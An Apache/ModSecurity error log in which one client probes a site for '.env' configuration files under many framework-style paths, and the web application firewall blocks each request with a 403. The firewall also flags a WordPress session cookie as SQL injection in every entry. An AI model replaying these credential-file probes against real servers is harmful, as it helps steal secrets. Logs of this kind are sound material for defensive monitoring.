[Mon May 11 14:10:04.088399 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/shopify/.env"] [unique_id "agHHHFchVQ3tCn0m9OpA8gAAAQ4"]
[Mon May 11 14:10:04.088635 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/shopify/.env"] [unique_id "agHHHFchVQ3tCn0m9OpA8gAAAQ4"]
[Mon May 11 14:10:04.310497 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /prestashop/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/prestashop/.env"] [unique_id "agHHHFchVQ3tCn0m9OpA9AAAAQ4"]
[Mon May 11 14:10:04.310874 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: f884b2c740b85dfbc9c7b3f14af878cb||1778503185||1778502825"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/prestashop/.env"] [unique_id "agHHHFchVQ3tCn0m9OpA9AAAAQ4"]
[Mon May 11 14:10:04.311056 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/prestashop/.env"] [unique_id "agHHHFchVQ3tCn0m9OpA9AAAAQ4"]
[Mon May 11 14:10:04.311306 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/prestashop/.env"] [unique_id "agHHHFchVQ3tCn0m9OpA9AAAAQ4"]
[Mon May 11 14:10:04.572269 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /codeigniter/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/codeigniter/.env"] [unique_id "agHHHFchVQ3tCn0m9OpA9gAAAQ4"]
[Mon May 11 14:10:04.572639 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: f884b2c740b85dfbc9c7b3f14af878cb||1778503185||1778502825"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/codeigniter/.env"] [unique_id "agHHHFchVQ3tCn0m9OpA9gAAAQ4"]
[Mon May 11 14:10:04.572818 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/codeigniter/.env"] [unique_id "agHHHFchVQ3tCn0m9OpA9gAAAQ4"]
[Mon May 11 14:10:04.573053 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/codeigniter/.env"] [unique_id "agHHHFchVQ3tCn0m9OpA9gAAAQ4"]
[Mon May 11 14:10:04.801071 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /cakephp/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/cakephp/.env"] [unique_id "agHHHFchVQ3tCn0m9OpA-AAAAQ4"]
[Mon May 11 14:10:04.801478 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: f884b2c740b85dfbc9c7b3f14af878cb||1778503185||1778502825"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/cakephp/.env"] [unique_id "agHHHFchVQ3tCn0m9OpA-AAAAQ4"]
[Mon May 11 14:10:04.801677 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/cakephp/.env"] [unique_id "agHHHFchVQ3tCn0m9OpA-AAAAQ4"]
[Mon May 11 14:10:04.801956 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/cakephp/.env"] [unique_id "agHHHFchVQ3tCn0m9OpA-AAAAQ4"]
[Mon May 11 14:10:05.003226 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /zend/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/zend/.env"] [unique_id "agHHHVchVQ3tCn0m9OpA-gAAAQ4"]
[Mon May 11 14:10:05.003604 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: f884b2c740b85dfbc9c7b3f14af878cb||1778503185||1778502825"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/zend/.env"] [unique_id "agHHHVchVQ3tCn0m9OpA-gAAAQ4"]
[Mon May 11 14:10:05.003785 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/zend/.env"] [unique_id "agHHHVchVQ3tCn0m9OpA-gAAAQ4"]
[Mon May 11 14:10:05.004039 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/zend/.env"] [unique_id "agHHHVchVQ3tCn0m9OpA-gAAAQ4"]
[Mon May 11 14:10:05.196606 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /yii/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/yii/.env"] [unique_id "agHHHVchVQ3tCn0m9OpA_AAAAQ4"]
[Mon May 11 14:10:05.196979 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: f884b2c740b85dfbc9c7b3f14af878cb||1778503185||1778502825"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/yii/.env"] [unique_id "agHHHVchVQ3tCn0m9OpA_AAAAQ4"]
[Mon May 11 14:10:05.197179 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/yii/.env"] [unique_id "agHHHVchVQ3tCn0m9OpA_AAAAQ4"]
[Mon May 11 14:10:05.197414 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/yii/.env"] [unique_id "agHHHVchVQ3tCn0m9OpA_AAAAQ4"]
[Mon May 11 14:10:05.446531 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /laravel5/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/laravel5/.env"] [unique_id "agHHHVchVQ3tCn0m9OpA_gAAAQ4"]
[Mon May 11 14:10:05.446909 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: f884b2c740b85dfbc9c7b3f14af878cb||1778503185||1778502825"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/laravel5/.env"] [unique_id "agHHHVchVQ3tCn0m9OpA_gAAAQ4"]
[Mon May 11 14:10:05.447116 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/laravel5/.env"] [unique_id "agHHHVchVQ3tCn0m9OpA_gAAAQ4"]
[Mon May 11 14:10:05.447375 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/laravel5/.env"] [unique_id "agHHHVchVQ3tCn0m9OpA_gAAAQ4"]
[Mon May 11 14:10:05.596355 2026] [core:error] [pid 1320398:tid 1320404] [client 52.242.216.199:21728] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:10:05.596480 2026] [core:error] [pid 1320398:tid 1320404] [client 52.242.216.199:21728] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:10:05.615551 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /v1/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/v1/.env"] [unique_id "agHHHVchVQ3tCn0m9OpA_wAAAQ4"]
[Mon May 11 14:10:05.615902 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: f884b2c740b85dfbc9c7b3f14af878cb||1778503185||1778502825"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/v1/.env"] [unique_id "agHHHVchVQ3tCn0m9OpA_wAAAQ4"]
[Mon May 11 14:10:05.616090 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/v1/.env"] [unique_id "agHHHVchVQ3tCn0m9OpA_wAAAQ4"]
[Mon May 11 14:10:05.616327 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/v1/.env"] [unique_id "agHHHVchVQ3tCn0m9OpA_wAAAQ4"]
[Mon May 11 14:10:05.829323 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /v2/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/v2/.env"] [unique_id "agHHHVchVQ3tCn0m9OpBAQAAAQ4"]
[Mon May 11 14:10:05.829704 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: f884b2c740b85dfbc9c7b3f14af878cb||1778503185||1778502825"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/v2/.env"] [unique_id "agHHHVchVQ3tCn0m9OpBAQAAAQ4"]
[Mon May 11 14:10:05.829886 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/v2/.env"] [unique_id "agHHHVchVQ3tCn0m9OpBAQAAAQ4"]
[Mon May 11 14:10:05.830139 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/v2/.env"] [unique_id "agHHHVchVQ3tCn0m9OpBAQAAAQ4"]
[Mon May 11 14:10:06.038606 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /v3/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/v3/.env"] [unique_id "agHHHlchVQ3tCn0m9OpBAwAAAQ4"]
